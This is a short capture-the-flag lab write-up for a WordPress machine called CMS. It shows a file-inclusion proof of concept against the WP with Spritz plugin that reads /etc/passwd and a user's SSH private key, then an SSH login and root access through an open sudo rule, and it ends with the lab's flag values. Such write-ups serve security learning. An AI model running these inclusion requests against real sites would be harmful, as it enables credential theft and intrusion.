172.31.1.8
Cybersec Labs CMS Writeup
Another wordpress site

Running WPscan we find /uploads directory





Which has a screenshot of an id_rsa file’s location which is in /home/angel/.ssh/id_rsa
also wpscan shows twenty twenty theme vulnerable
but cant find anything

But there’s a plugin with RFI
WordPress Plugin WP with Spritz 1.0 – Remote File Inclusion

Proof of Concept
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec

so going to


It’s not properly formatted so viewing source code
we get private key for user angel
login via ssh
ssh -i id_rsa angel@172.31.1.8
Running sudo -l
User angel may run the following commands on cms:
(ALL : ALL) NOPASSWD: ALL
So sudo su and we are root
root@cms:/home/angel# cat access.txt
d5ca58536a32935299d9f1026436f149
root@cms:~# cat system.txt
459daa8ee877e8048563ca65dc867afa
Author
Sentinal920
Leave a Reply
You must be logged in to post a comment.